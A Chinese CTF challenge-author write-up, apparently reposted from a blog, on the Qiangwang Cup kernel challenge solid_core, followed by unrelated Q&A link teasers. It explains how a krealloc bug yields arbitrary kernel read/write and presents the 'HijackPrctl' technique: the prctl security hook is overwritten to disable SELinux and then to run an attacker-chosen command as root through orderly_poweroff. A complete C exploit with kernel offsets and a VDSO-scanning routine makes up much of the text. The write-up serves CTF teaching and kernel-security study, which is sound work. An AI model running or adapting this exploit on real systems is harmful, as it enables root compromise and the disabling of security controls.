強網杯出題思路-solid_core-HijackPrctl

2018-03-29 17:58:31 看雪學院

強網杯出題思路-solid_core-HijackPrctl

0x00 概述

solid_core出題時候,基本上是以CSAW-2015-CTF的stringipc題目為基礎進行內存讀寫的限制,CSAW-2015-CTF中的題目是一個krealloc的利用。

在krealloc的定義中mm/slab_common.c中

強網杯出題思路-solid_core-HijackPrctl

如果size=0,krealloc返回值為0x10

強網杯出題思路-solid_core-HijackPrctl

通過修改size=-1,使得kremalloc的返回值變成0x10,同時size因為是0xFFFFFFFFFFFFFFFF所以可以進行任意地址讀寫。

強網杯出題思路-solid_core-HijackPrctl

那麼傳統思路下一步提權的方法有兩種,下面進行介紹。

0x01 任意地址讀寫到權限提升(傳統思路)

下面以csaw-2015的stringipc為例子來介紹兩種從任意地址讀寫到權限提升到權限的傳統思路

1. 爆破cred結構位置並篡改

做過內核漏洞利用的同學應該都瞭解task_struct中的cred結構代表了該進程的權限結構。

強網杯出題思路-solid_core-HijackPrctl

如果我們能夠修改cred結構的值那麼就可以進行提權操作。這是一個很正常的思路,但是我們的cred結構地址在哪裡呢?這裡CSAW給出的思路是通過prctl設置comm結構為一個Random的字符串是,然後通過爆破這個Random的字符串,每八個字節進行遍歷,耗時比較久,但是是可行的。

鏈接如下 https://github.com/mncoppola/StringIPC/blob/master/solution/solution.c

2. RET2DIR攻擊(劫持VDSO)

第二種方法是使用RET2DIR攻擊,在這裡CSAW-2015-stringipc可以通過攻擊VDSO來劫持用戶態的代碼執行流程。下面我們先來補充一下VDSO的知識:

(1)linux下的VDSO

VDSO(Virtual Dynamically-linked Shared Object)是個很有意思的東西, 它將內核態的調用映射到用戶態的地址空間中, 使得調用開銷更小, 路徑更好.

開銷更小比較容易理解, 那麼路徑更好指的是什麼呢? 拿x86下的系統調用舉例, 傳統的int 0x80有點慢, Intel和AMD分別實現了sysenter, sysexit和syscall, sysret, 即所謂的快速系統調用指令, 使用它們更快, 但是也帶來了兼容性的問題.

於是Linux實現了vsyscall, 程序統一調用vsyscall, 具體的選擇由內核來決定. 而vsyscall的實現就在VDSO中.

Linux(kernel 2.6 or upper)環境下執行ldd /bin/sh, 會發現有個名字叫linux-vdso.so.1(老點的版本是linux-gate.so.1)的動態文件, 而系統中卻找不到它, 它就是VDSO. 例如:

$ ldd /bin/sh

linux-vdso.so.1 => (0x00007fff2f9ff000)

libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f28d5b36000)

/lib64/ld-linux-x86-64.so.2 (0x00007f28d5eca000)

所以,不難理解,VDSO是一段內核空間的代碼,用來提供給用戶態下更快地調用系統調用。正是因為這個特殊的機制,使得我們可以進行攻擊。

在CSAW-CTF-2015的stringipc題目中,內核態下VDSO頁的權限是RW,這個代碼頁會被直接映射到用戶態下的進程中,以滿足gettime等頻繁系統調用的速度。這個代碼頁映射到用戶態的權限屬性是RX,就是可以執行。所以,我們可以通過在內核態下通過任意寫來修改VDSO的代碼,譬如我們修改代碼成為prepare_cred+commited_cred等,這樣在用戶調用VDSO時,就可以劫持控制流了。

具體鏈接如下: http://itszn.com/blog/?p=21

這裡也有一個問題:VDSO位置在哪裡呢?這個可以爆破,因為我們有了任意地址讀的權限,不過和上面爆破cred結構的技術不一樣,我們可以更快的爆破,因為VDSO必定是被安防到一個內存頁裡面,也就是頁對其的,同時它是一個ELF文件,是有ELF Signurte,所以我們可以按照內存頁的偏移來進行爆破,這樣爆破速度會很快,大概是256倍,而且它的映射位置離內核基址並不是太遠,可以很快就出來了。

0x02 題目修改思路

題目為了限制大家不能使用cred覆蓋和ret2dir攻擊利用方法,我對csaw-ctf-2015進行了修改,限制了內存讀寫範圍。

我進行了限制,限制寫入範圍必須大於0xffffffff80000000,這個地址在linux內存分佈中,是kernel base以上。

附上linux 內核內存分佈圖

強網杯出題思路-solid_core-HijackPrctl

所以可以限制cred被覆蓋,同時編譯最新內核以限制VDSO在內核情況下不能被修改。

強網杯出題思路-solid_core-HijackPrctl

可以使得上兩種的利用方法失效,以期待有高手能夠給出一種另外的利用思路,同時我也給出了一種限制之後可以成功利用思路,也就是HijackPrctl,下面進行詳細介紹。

0x03 HijackPrctl- A reliable linux root Techniques

下面介紹從內核地址任意讀寫(或者可以限制為局部地址讀寫)到任意代碼執行的一種新型的Reliable Linux Root技術,這個思路其實也不算最新的,是來自於INetCop Security 分享的New Reliable Android Kernel Root Exploitation Techniques,這種漏洞利用思路主要是要劫持Prctl函數,最後跳轉到call_usermodehelper,我姑且把這種方法稱作HijackPrctl。

我們再來確定一下現在能做的事情,我們可以進行局部地址的任意讀寫,題目限制了讀寫範圍必須大於0xffffffff80000也就是kernel base以上。為了達到代碼執行,我們先找一個內核函數看能不能劫持的。

0x01 Prctl(用戶和內核溝通的一個絕佳函數)

這裡要介紹一下Prctl函數,這個函數可以對進程進行一些設置,通過查看linux內核源碼,可以知道這個函數是一個內核漏洞利用中的絕佳函數。

在include/linux/security.h中可以看到cap_task_prctl擁有6個參數。

強網杯出題思路-solid_core-HijackPrctl

同時在kernel/sys.c中,可以看到對於prctl這個系統調用的處理過程中,將參數原封不動的傳給了security_task_prctl函數進行處理。

強網杯出題思路-solid_core-HijackPrctl

繼續往下跟進,我們發現security_task_prctl這個函數其實最後是定位到了一個虛表裡面去,

強網杯出題思路-solid_core-HijackPrctl

在調試時候我們會找到這個hook的位置在哪裡,在這裡是capability+0x520+0x18這個偏移,這個偏移在IDA中也能分析出來。

強網杯出題思路-solid_core-HijackPrctl

強網杯出題思路-solid_core-HijackPrctl

這樣的話,我們就找到了一個可以通過用戶態傳最多6個參數並且到內核態原封不動執行的虛函數。也就是意味我們可以通過修改這個指針,可以任意執行一個函數了。

0x02 32位和64位區別

基於上面的分析我們可以通過用戶態傳遞參數,在內核態下任意執行6個參數以下的函數。再仔細分析一下,對嗎?在32位下是可以的,在64位下並不是。我們再看這個函數int security_task_prctl(int option, unsigned long ...)發現第一個參數option是int類型,也就是我們傳入的64位會被截斷成為32位,這也就導致了64位,第一個參數不能用了。

這個不影響32位下的漏洞利用,我們繼續來分析32位如何利用。

其實,這裡有很多思路,INetCop Security的Slide裡面有,我這裡介紹另外一種基於VDSO變形的方法,也是看雪論壇上(https://bbs.pediy.com/thread-220057.htm),提出的一種方法。

具體思路是:

先通過劫持task_prctl,將其修改成為set_memory_rw

然後傳入VDSO的地址,將VDSO修改成為可寫的屬性,

然後之後的步驟就和劫持VDSO方法是一樣的了。

這種方法我進行了驗證64位內核上是不可行的,就是因為第一個參數被截斷的原因。

0x03 call_usermoderhelper內核線程執行

call_usermoderhelper是內核運行用戶程序的一個api,並且該程序有root的權限。如果我們能夠控制性的調用它,就能以Root權限執行我們想要執行的程序了。

定義在kernel/umh.c中

強網杯出題思路-solid_core-HijackPrctl

subprocess_info如下

強網杯出題思路-solid_core-HijackPrctl

我們要劫持task_prctl到call_usermoderhelper嗎,不是的,因為這裡的第一個參數也是64位的,也不能直接劫持過來。但是內核中有些代碼片段是調用了Call_usermoderhelper的,可以轉化為我們所用。

譬如kernel/reboot.c中的orderly_poweroff函數中調用了run_cmd參數是poweroff_cmd,而且poweroff_cmd是一個全局變量,可以修改。

強網杯出題思路-solid_core-HijackPrctl

那麼我們就先篡改poweroff_cmd=我們預期執行的命令,然後直接劫持task_prctl到orderly_poweroff函數,這樣就任意命令執行了,同時按照INetCop Security給出的思路,需要先關閉selinux。

所以再整理一下整體思路:

利用kremalloc的問題,達到任意地址讀寫的能力

通過快速爆破,洩露出VDSO地址。

利用VDSO和kernel_base相差不遠的特性,洩露出內核基址

篡改prctl的hook為selinux_disable函數的地址

調用prctl使得selinux失效

篡改poweroff_cmd使其等於我們預期執行的命令。

篡改prctl的hook為orderly_poweroff

調用prctl執行我們預期的命令,達到內核提權的效果。

最後給出利用程序如下

#include

#include

#include

#include

#include

#include

#include

#include

#define CSAW_IOCTL_BASE 0x77617363

#define CSAW_ALLOC_CHANNEL CSAW_IOCTL_BASE+1

#define CSAW_OPEN_CHANNEL CSAW_IOCTL_BASE+2

#define CSAW_GROW_CHANNEL CSAW_IOCTL_BASE+3

#define CSAW_SHRINK_CHANNEL CSAW_IOCTL_BASE+4

#define CSAW_READ_CHANNEL CSAW_IOCTL_BASE+5

#define CSAW_WRITE_CHANNEL CSAW_IOCTL_BASE+6

#define CSAW_SEEK_CHANNEL CSAW_IOCTL_BASE+7

#define CSAW_CLOSE_CHANNEL CSAW_IOCTL_BASE+8

struct alloc_channel_args {

size_t buf_size;

int id;

};

struct open_channel_args {

int id;

};

struct read_channel_args {

int id;

char *buf;

size_t count;

};

struct write_channel_args {

int id;

char *buf;

size_t count;

};

struct close_channel_args {

int id;

};

struct shrink_channel_args {

int id;

size_t size;

};

struct seek_channel_args {

int id;

loff_t index;

int whence;

};

int ID = 0;

int FD = 0;

void readMem(void* ptr, void* addr, size_t count) {

struct seek_channel_args seekArgs;

seekArgs.id = ID;

seekArgs.index = addr-0x10;

seekArgs.whence = SEEK_SET;

int ret = ioctl(FD, CSAW_SEEK_CHANNEL, &seekArgs);

int err = errno;

//fprintf(stderr,"Seek: %x err:%u\n",ret,err);

struct read_channel_args readArgs;

readArgs.id = ID;

readArgs.buf = ptr;

readArgs.count = count;

ret = ioctl(FD, CSAW_READ_CHANNEL, &readArgs);

err = errno;

//fprintf(stderr,"read: %x err:%u\n",ret,err);

}

void writeMem(void* ptr, void* addr, size_t count) {

struct seek_channel_args seekArgs;

seekArgs.id = ID;

seekArgs.index = addr-0x10;

seekArgs.whence = SEEK_SET;

int ret = ioctl(FD, CSAW_SEEK_CHANNEL, &seekArgs);

int err = errno;

//fprintf(stderr,"Seek: %x err:%u\n",ret,err);

struct write_channel_args writeArgs;

writeArgs.id = ID;

writeArgs.buf = ptr;

writeArgs.count = count;

ret = ioctl(FD, CSAW_WRITE_CHANNEL, &writeArgs);

err = errno;

//fprintf(stderr,"write: %x err:%u\n",ret,err);

}

int main(int argc,char* argv[]) {

//offset_set_memory_rw 0x079340 sbin_poweroff 0x123D1E0 call_poweroff 0x09C4C0

//offset_prctl_hook 0x124FD00 selinux_disable 0x2C7BA0

//./exp 0x124FCC0 0x123D2E0 0x09D510 0x2C2E10

//capability+0x520

long unsigned int offset_set_memory_rw=0x06da70;

long unsigned int offset_prctl_hook=0x1140ae0;

long unsigned int offset_task_prctl=0x2f7e69;

long unsigned int offset_call_modprobe=0x0ae3b2;

//long unsigned int offset_call_poweroff=0x0a0880;//call_usermod

long unsigned int offset_call_poweroff=0x0acb00;

long unsigned int offset_selinux_disable=0x303b10;

long unsigned int offset_sbin_poweroff=0x105a4e0;

long unsigned int offset_modprobe_path=0x105ac80;

if (argc!=5)

{

fprintf(stderr,"Usage: %s offset_prctl_hook offset_sbin_poweroff offset_call_poweroff offset_selinux_disable\n",argv[0]);

exit(-1);

}

//offset_set_memory_rw=strtoul(argv[1],NULL,16);

offset_prctl_hook=strtoul(argv[1],NULL,16);

offset_sbin_poweroff=strtoul(argv[2],NULL,16);

offset_call_poweroff=strtoul(argv[3],NULL,16);

offset_selinux_disable=strtoul(argv[4],NULL,16);

int fd = open("/proc/simp1e",O_NONBLOCK);

char cmd[256];

memset(cmd,0,sizeof(cmd));

fprintf(stderr,"Input Your Cmd $:");

read(0,&cmd,256);

FD = fd;

struct alloc_channel_args arg1;

arg1.buf_size=100;

int ret = ioctl(fd,CSAW_ALLOC_CHANNEL,&arg1);

fprintf(stderr,"allocate fd: %d ret: %d id:%u\n",fd,ret,arg1.id);

ID = arg1.id;

struct shrink_channel_args shrinkArgs;

shrinkArgs.id = arg1.id;

shrinkArgs.size=101;

ret = ioctl(fd, CSAW_SHRINK_CHANNEL, &shrinkArgs);

int err = errno;

fprintf(stderr,"Shrink: %d err:%u\n",ret,err);

fprintf(stderr,"ZERO_SIZED_POINTER = %p\n",((void*)16));

//Random buffer to throw things into

//char* what = malloc(0x1000*0x1000);

//Scanning for elf headers to find VDSO

void* header = 0;

void* loc = 0xffffffff80000000;

size_t i = 0;

for (; loc<0xffffffffffffafff; loc+=0x1000) {

readMem(&header,loc,8);

if (header==0x010102464c457f) {

fprintf(stderr,"%p elf\n",loc);

readMem(&header,loc+0x2B8,8);

//Look for 'clock_ge' signature (may not be at this offset, but happened to be)

if (header==0x65675f6b636f6c63) {

fprintf(stderr,"%p found it?\n",loc);

break;

}

}

}

long unsigned int kernel_base=(long unsigned int)loc&0xffffffffff000000;

long unsigned int real_set_memory_rw=kernel_base+offset_set_memory_rw;

long unsigned int real_prctl_hook=kernel_base+offset_prctl_hook;

long unsigned int real_task_prctl=0;

long unsigned int real_call_modprobe=0;

long unsigned int real_modprobe_path=0;

long unsigned int real_selinux_disable=0;

long unsigned int real_sbin_poweroff=kernel_base+offset_sbin_poweroff;

long unsigned int real_call_poweroff=0;

long unsigned int try_offset=0;

//cur_offset= (real_set_memory_rw >>20 ) &0xff

printf("real_sbin_poweroff:%p real_prctl_hook:%p\n",real_sbin_poweroff,real_prctl_hook);

for( i=0; i<0x20;i+=1)

{

try_offset = real_sbin_poweroff- 0x100000*i ;

printf("%p is trying!\n",try_offset);

readMem(&header, (void*)try_offset,8);

printf("%p is read!\n",header);

//if (header==0xec834800f28db6e8){

if (header==0x6f702f6e6962732f){

fprintf(stderr,"%p is real_sbin_poweroff\n",try_offset);

real_sbin_poweroff=try_offset;

real_prctl_hook-=(0x100000*i);

break;

}

}

if (i==0x20)

{

fprintf(stderr,"Not found!\n");

exit(-1);

}

real_task_prctl = real_sbin_poweroff -offset_sbin_poweroff + offset_task_prctl;

//real_call_modprobe = real_sbin_poweroff -offset_sbin_poweroff + offset_call_modprobe;

printf("set_memory_rw:%p real_prctl_hook:%p \n real_task_prctl:%p\n real_call_modprobe:%p \n",real_set_memory_rw,real_prctl_hook,real_task_prctl,real_call_modprobe);

//real_modprobe_path = real_sbin_poweroff -offset_sbin_poweroff + offset_modprobe_path;

real_selinux_disable = real_sbin_poweroff -offset_sbin_poweroff + offset_selinux_disable;

real_sbin_poweroff = real_sbin_poweroff -offset_sbin_poweroff + offset_sbin_poweroff;

real_call_poweroff = real_sbin_poweroff -offset_sbin_poweroff + offset_call_poweroff;

printf("path %p selinux_disable: %p\n",real_modprobe_path,real_selinux_disable);

printf("Hijiack Prctl!\n");

getchar();

writeMem(&real_selinux_disable,real_prctl_hook,sizeof(real_set_memory_rw));

ret = prctl(loc,2, loc,loc,2);

//char * hijack_path= "/bin/ls\\x00";

//char * hijack_path= "/bin/cat /flag > /tmp/flag\\x00\\x00\\x00";

char * hijack_path= "/bin/mkdir -p /tmp/x0x\\x00\\x00\\x00";

//writeMem(hijack_path,real_modprobe_path,128);

//writeMem(hijack_path,real_sbin_poweroff,128);

writeMem(&cmd,real_sbin_poweroff,228);

//exit(-1);

//Write our shellcode over the gettimeofday function at offset 0xca0

//writeMem(&real_set_memory_rw,real_prctl_hook,sizeof(real_set_memory_rw));

writeMem(&real_call_poweroff,real_prctl_hook,sizeof(real_set_memory_rw));

printf("Start Prctl!\n");

getchar();

ret = prctl(loc,2, loc,loc,2);

printf("end Prctl!\n");

for(i=0;i<0x0;i+=1)

{

writeMem(&real_call_poweroff,real_prctl_hook+8*i,sizeof(real_set_memory_rw));

}

//Write our shellcode over the gettimeofday function at offset 0xca0

// writeMem(sc,loc+0xd30,strlen(sc));

//Wait a bit for a daemon or logger to call gettimeofday()

// system("nc -l -p 3333 -v");

// exit(1);

}

0x04 寫在後面

很慘,出題時候由於一些設置問題,產生了一些的非預期解(一共有5只隊伍解出題目,三隻使用非預期解,兩隻使用正解),不過這些非預期解也讓我學習到了很多知識(姿勢)。

同時在題目部署中也出現了一些問題,但是因為已經出現了非預期解,保持題目公平性,所以也就沒有進行繼續修改了。

同時在出這道題目的過程中,多次對內核進行編譯,對於很多以前不知道的內核知識進行補充,踩了很多坑,也學了很多。

最後祝賀做出此題的戰隊以及參與強網杯比賽的各位戰隊,希望能夠和各位大神繼續交流內核漏洞相關的知識。

同時最近出現的ubuntu16.04提權漏洞也是一個任意內存讀寫漏洞,理論上也能夠使用該種方法進行提權,下面我會抽時間進行調試並分析。

如果大家還想繼續做這道題目的話,題目繼續在10.9.173.101 9999開放。

同時本文也在本人博客上面進行發表。http://leanote.com/blog/post/5ab78270ab64413755000dcf

vdso http://adam8157.info/blog/2011/10/linux-vdso/

ret2dir http://www.cnblogs.com/0xJDchen/p/6143102.html

usermode-helper https://www.ibm.com/developerworks/cn/linux/l-user-space-apps/index.html

attack_vdso https://hardenedlinux.github.io/translation/2015/11/25/Translation-Bypassing-SMEP-Using-vDSO-Overwrites.html

ret2dir-balckhat https://www.blackhat.com/docs/eu-14/materials/eu-14-Kemerlis-Ret2dir-Deconstructing-Kernel-Isolation.pdf

reliable linux root http://powerofcommunity.net/poc2016/x82.pdf

利用分頁機制進行攻擊

https://github.com/n3k/CansecWest2016_Getting_Physical_Extreme_Abuse_of_Intel_Based_Paging_Systems/blob/master/Demos/Linux/driver/kernetix.c

New Reliable Android Kernel Root Exploitation Techniques http://powerofcommunity.net/poc2016/x82.pdf

分享到:

閱讀更多 看雪學院 的文章

關鍵字: 強網杯 英特爾 出題

相關文章:

剛剛工作的畢業生,一個月只有2000多,是不是太少了?

剛剛工作的畢業生,一個月只有2000多,是不是太少了?

剛剛:剛剛工作的畢業生,一個月只有2000多,是不是太少了? 根據你城市消費水平來看啊,還有你從事的工作,假如你在二三線城市做一份事業單位或者是編制類的工作,薪資水平是隨著你工作年限逐年增長的,而且在年終也有很多福利補貼待遇等等,算下來收入也是可觀的,再舉一個例:-畢業生 2000

為什麼只有edg賺錢?

為什麼只有edg賺錢?

電競行業作為一個新興產業,這幾年發展勢頭越來越好,IG戰隊,FPX戰隊先後奪得了s8-s9世界賽的冠軍,據俱樂部知情人士透露,除了國內的幾家豪門俱樂部之外,其他俱樂部基本都是虧錢在做的,當然EDG也是:-edg 賺錢:為什麼只有edg賺錢?

網上羅馬仕充電寶20000毫安的,參數怎麼很多樣?哪個是真的?

網上羅馬仕充電寶20000毫安的,參數怎麼很多樣?哪個是真的?

20000:網上羅馬仕充電寶20000毫安的,參數怎麼很多樣?哪個是真的? 天貓旗艦店,或者淘寶旗艦店,或者京東旗艦店肯定包真,質量好,再說可以官方驗證啊,不能圖那十塊五塊的便宜,畢竟一個充電寶要用好久呢,一兩年沒問題的。:-羅馬仕 馬仕 毫安

我們買的新商品房還沒有拿到房產證,怎麼轉賣最好?

我們買的新商品房還沒有拿到房產證,怎麼轉賣最好?

沒有取得房抄產證的房子可以轉讓。但如果確定無法取得房產證的,房產轉讓不受法律保襲護。一般情況下,只有取得房產證的房屋才能確定房屋產權人,才具有轉讓的條件。但如果房屋是合法取得的,以百後可以依法辦理度房:-轉賣 房產證 商品房 拿到:我們買的新商品房還沒有拿到房產證,怎麼轉賣最好?

為什麼突厥人可以成功復國?是大唐的刀不鋒利了麼?

為什麼突厥人可以成功復國?是大唐的刀不鋒利了麼?

鋒利 突厥人 你這樣說只能說明你對歷史非常不瞭解,我先用一句話概括突厥被大唐雄兵打的有多慘:三次滅國,背井離鄉,遠赴西亞,打不過,俺躲著你還不行嗎?突厥的意思是中間慫起的頭盔。其來歷已經不可靠,可能有著匈奴、鮮卑或:-復國 大唐:為什麼突厥人可以成功復國?是大唐的刀不鋒利了麼?

小高層16層高樓間距60米哪一層比較好?

小高層16層高樓間距60米哪一層比較好?

小高層 60:小高層16層高樓間距60米哪一層比較好? 首先需要明白,選擇層數居住與樓間距毫無關係,住在哪一層,肉眼看對面樓的距離,是相差不大的。設定樓間距60米,純粹是混淆視聽。其實,一幢樓的樓層總數確定的情況下,到底哪一層最佳?很簡單,取總層數乘以黃金:-樓間距 層高

金銀花盆栽好養嗎?怎麼養?

金銀花盆栽好養嗎?怎麼養?

金銀花可以盆栽,很好養的!金銀花,是忍冬科的常綠纏繞灌木,枝條柔韌修長,多攀爬或匍匐生長。金銀花生性強健,在我國的很多南方省份野外很多地區都能看到它的身影,葉子常年翠綠,到夏季開花,飄香四溢。所以,有:-金銀花 盆栽:金銀花盆栽好養嗎?怎麼養?

長城對於抵禦古代匈奴和蒙古人起到了多大作用?

長城對於抵禦古代匈奴和蒙古人起到了多大作用?

長城真的無用嗎?在今天許多人認為長城無用,古代國家舉國之力建造的長城不過只是文物,就連康熙都曾作詩諷刺,原文如下:萬里經營到海涯,紛紛調發逐浮誇。當時用盡生民力,天下何曾屬爾家。-康熙但真的如此嗎?小:-匈奴 抵禦 長城:長城對於抵禦古代匈奴和蒙古人起到了多大作用? 蒙古人

什麼樹可以嫁接臘梅?

什麼樹可以嫁接臘梅?

臘梅只能嫁接在不同品種的臘梅上,其他的樹種不行!臘梅的繁殖可以用播種,壓條,嫁接,分株等繁殖方法。播種法因不易保持花卉的原有優良特性,且播種的優點是在於大量繁殖,而臘梅大都只需培植少量幾株,故一般都不:-臘梅 嫁接:什麼樹可以嫁接臘梅?

行情堪憂,還有多少教育機構的老師們五一假期有課上的?課時量多不多?

行情堪憂,還有多少教育機構的老師們五一假期有課上的?課時量多不多?

堪憂 五一 假期:行情堪憂,還有多少教育機構的老師們五一假期有課上的?課時量多不多? 事實上,因為教育培訓都是預收費用的模式。但凡有一點點規模的培訓機構老師。在上半年,帶課量是可以得到保證。:-課時量

在農村“立夏節”都有哪些民間習俗?

在農村“立夏節”都有哪些民間習俗?

民間習俗 農村:在農村“立夏節”都有哪些民間習俗? 在農村“立夏節”都有哪些民間習俗一、農村立夏常見的習俗風俗活動:1、吃雞蛋“立夏吃蛋”習俗由來已久,俗話說“立夏吃了蛋,夏天不疰夏”。據說立夏開始天氣越來越熱,村裡小孩兒會有身體疲勞四肢無力的感覺,吃:-立夏節

男朋友失望分手,但對我還有感覺,答應我兩個月之後可以在一起,我應該怎麼做,才能改變之前他對我的看法?

失望 分手 看法:男朋友失望分手,但對我還有感覺,答應我兩個月之後可以在一起,我應該怎麼做,才能改變之前他對我的看法? 你的這個問題特別的有趣,我覺得你先不要看你要怎麼做才讓他才能讓他對你的印象有所改變,你要去看為什麼是兩個月之後可以在一起,這兩個月他會用來做什麼,為什麼會有這兩個月?例如他的身體碰到了什麼樣的問題嗎?:-答應我

工程分包乙方人員傷殘誰承擔?

承擔:工程分包乙方人員傷殘誰承擔? 分包 乙方分包致人傷殘責任誰承擔?嚴格來說,需要了解更多傷殘原因才能區分的,作為非專業人士,自己發表一點淺見供題主參考:1、如果甲方是央企的話,他們合同中的責任、義務等條款內已經將自己的責任全部撇開了,更會:-乙方 傷殘

有哪些看起來毫不相關的兩個歷史人物實際上有過聯繫?

有哪些看起來毫不相關的兩個歷史人物實際上有過聯繫?

實際上:有哪些看起來毫不相關的兩個歷史人物實際上有過聯繫? 歷史人物 聯繫這個詞貌似太寬泛了,就好像有一個調皮的答案說的,胡亥和溥儀相隔2000多年,牽強的找,也有聯繫:都是亡國之君不是。我想題主的意思是兩個看起來應該風馬牛不相及的人物,在歷史上居然是熟悉或是一個時代的:-毫不相關

13年雪鐵龍世嘉自動擋7萬多公里,沒有水泡事故,多少錢能買?

法系車不保值,如果準備常開可以入手,性價比高,價格應該在二至三萬之間,二手車一車一況,一況一價,居體價格看車況。:-錢能 水泡:13年雪鐵龍世嘉自動擋7萬多公里,沒有水泡事故,多少錢能買? 世嘉 自動擋

22+吃土少女17年就有駕駛證了,今年才開始開車,想買個二手昂克賽拉,或者有什麼好建議嗎?

22+吃土少女17年就有駕駛證了,今年才開始開車,想買個二手昂克賽拉,或者有什麼好建議嗎?

17年 駕駛證 二手:22+吃土少女17年就有駕駛證了,今年才開始開車,想買個二手昂克賽拉,或者有什麼好建議嗎? 建議買日系二手車,開順了賣了,買新車,昂克賽拉無法再次出手時獲得好價格,而且也不省油,開完日系車直接換德系:-昂克賽拉

如何騎車去臺灣騎行?

如何騎車去臺灣騎行?

騎車 在臺灣沒有迴歸內地前,最好不要去臺灣,一是國內政策不允許你去臺灣,因為已停止了臺灣個人遊。二是你偷著去臺灣旅遊,安全沒有保障,偷渡客在哪裡也沒有安全保障的。以後內地政策允許個人去臺灣旅遊了,建議那時再:-騎行 臺灣:如何騎車去臺灣騎行?

本人預算5萬左右,想買一輛二手法系車!求推薦?

本人預算5萬左右,想買一輛二手法系車!求推薦?

預算:本人預算5萬左右,想買一輛二手法系車!求推薦? 5萬 預算5萬元左右,想買一輛二手法系車?推薦東風標緻老款308車型。1 5萬元可以買標緻308車況好的,沒大事故呢,年限15年左右,公里數3萬左右,手動檔車型。2 標緻308車型,底盤調教紮實,跑高速穩定:-法系 二手

14年進口馬自達5PK進口10年道奇酷威買哪個划算?

14年進口馬自達5PK進口10年道奇酷威買哪個划算?

道奇 你好,好高興回答你的問題!14年進口馬自達5和10年月道奇酷威個人感覺馬自達5比較划算。新車價馬5報價29.99萬,酷威19.38萬兩款車都是原裝進口,馬5屬於日系,酷威屬於美系。兩款車不屬於同類車型:-酷威 馬自達 14年:14年進口馬自達5PK進口10年道奇酷威買哪個划算?

2020年,河南教育行業國務院特殊津貼推薦,河南大學並列第三,大家怎麼看?

2020年,河南教育行業國務院特殊津貼推薦,河南大學並列第三,大家怎麼看?

特殊津貼 高校人才就要重視,河南省高校人才更要重視,這個人才不是評出了的,而是推薦出來的,沒有推薦,連參評的資格都沒有。國務院特殊津貼人員推薦,不推薦是百分百沒希望,推薦了希望就非常,那麼是什麼是國務院特殊津貼:-河南大學 並列 2020年:2020年,河南教育行業國務院特殊津貼推薦,河南大學並列第三,大家怎麼看?

本田CRV2019款1.5T舒適版油耗高嗎?

本田CRV2019款1.5T舒適版油耗高嗎?

李老貓說車為你非專業解答各種選車用車問題本田crv定位於一款緊湊級suv產品,主要對飈豐田榮放,日產奇駿,這款車整體市場表現非常突出,2019年全年累計銷量為18.44萬臺,平均月銷1.5萬以上,其深:-舒適版 本田 油耗:本田CRV2019款1.5T舒適版油耗高嗎?

國外疫情如果沒有得到有效控制,世界會發生什麼事情?頭腦風暴?

1.世界經濟遭到重創疫情影響之下,各行各業基本屬於停工停產的狀態,在世界經濟趨於一體化的今天,停工停產勢必會造成一系列的連鎖反應,最後導致的結果可能會引發金融危機。2.世界格局可能發生改變美國仍是世界:-頭腦風暴 控制:國外疫情如果沒有得到有效控制,世界會發生什麼事情?頭腦風暴? 疫情 國外

本田XRV這款車的整體表現怎麼樣?我想買1.5T自動豪華版,全款多少錢?

本田XRV這款車的整體表現怎麼樣?我想買1.5T自動豪華版,全款多少錢?

如果有15萬元的預算,讓你選擇一臺空間和動力都很不錯的小型SUV,我覺得很多的讀者都會想到本田XRV這款車型。因為本田XRV確實太出色了,和同級別的其他盒子SUV車型相比,這款車在空間和動力上都有優勢:-xrv 自動:本田XRV這款車的整體表現怎麼樣?我想買1.5T自動豪華版,全款多少錢? 本田 豪華版

現在存款有14萬,借了5萬還沒收回來,該做什麼好?

現在存款有14萬,借了5萬還沒收回來,該做什麼好?

何去何從:現在存款有14萬,借了5萬還沒收回來,該做什麼好? 續租 存款利息率較低,可以投資較高收益的項目,比如投資基金,一般情況下可獲得6%一10%的回報。如果行情好可達到50%以上收益,去年不少基金超過這目標。目前受疫情影響,股市在低位震盪,也是基金投資的機會。一:-存款 2300

2070super和5700xt買哪個比較好?

2070super和5700xt買哪個比較好?

如果是玩遊戲毫無疑問選擇n卡,也就是2070 suep。如果追求性價比可以選擇a卡,也就是5700xt. 為什麼遊戲選n卡呢?首先遊戲廠商針對n卡優化比較多,然後就是功耗小,然後N卡架構執行效率極高,:-:2070super和5700xt買哪個比較好?

生完二胎後,感覺自己有點抑鬱,總是想發火,特別煩躁,怎麼辦?

二胎 我是兩個孩子的媽媽,曾經的我和你一樣,生完寶寶我也抑鬱了,我知道抑鬱症真的很痛苦,產後的那段日子我整天都不開心,做什麼事也沒積極性,誰也不想搭理,別人給我說話我就覺得很煩。忍不住衝家人發脾氣。每當一個:-生完 抑鬱:生完二胎後,感覺自己有點抑鬱,總是想發火,特別煩躁,怎麼辦? 發火

人這一生遇到的人和事為什麼感覺都像是必然的經歷?

人這一生遇到的人和事為什麼感覺都像是必然的經歷?

感覺:人這一生遇到的人和事為什麼感覺都像是必然的經歷? 正所謂有因必有果,所以你今天的因,就會產生明天的果。所以這一切你就會覺得是必然的。生活中大部分是普通人大家的生活規律,生活方式,大致相同。當你看到別人家庭的果,自己家也產生同樣的果,你就會覺得這一切是:-人和 經歷

現在校內校外到底教的是美式英語還是英式英語還是混搭英語?

現在校內校外到底教的是美式英語還是英式英語還是混搭英語?

校內:現在校內校外到底教的是美式英語還是英式英語還是混搭英語? 校外 英式 答案肯定是不唯一的!美式英語現在是主流,少量英式發音也個別存在!但對於孩子來說,肯定是混搭英語,因為孩子肯定不是一直一位老師教下去,肯定會換老師!而老師的發音肯定是既有英式的,也有美式的!就連一些英語:-美式英語

上有老下有小,我們真的跳不出這個人生循環了嗎?

上有老下有小,我們真的跳不出這個人生循環了嗎?

上有老 魔咒:上有老下有小,我們真的跳不出這個人生循環了嗎? 的確如此,儘管現在不結婚,晚婚的人很多,但是從人類繁洐生息的歷史和大多數人來看,成家立業,生兒育女,家庭仍是主流,一個人的生理,心理和生存需求決定了生存狀態,生兒育女,瞻養父母即是義務責任,也是生活動:-下有小

如果外面正在下小雨,你會突然想起了誰?

如果外面正在下小雨,你會突然想起了誰?

想起:如果外面正在下小雨,你會突然想起了誰? 我最不忘,還是秋日的雨夜,天又涼了幾分,已經需要披上一件薄薄的外套了。臨窗而望,眼見窗臺上的幾株小植物,葉片上沾了幾滴小雨珠,我總喜歡,用小手電去照它們,這樣的小水滴看起來晶瑩晶瑩的,有一種清清涼涼的:-小雨

初中同學許久未見大學期間突然聯繫請吃飯,態度還良好,我給推了,會不會讓人很煩?

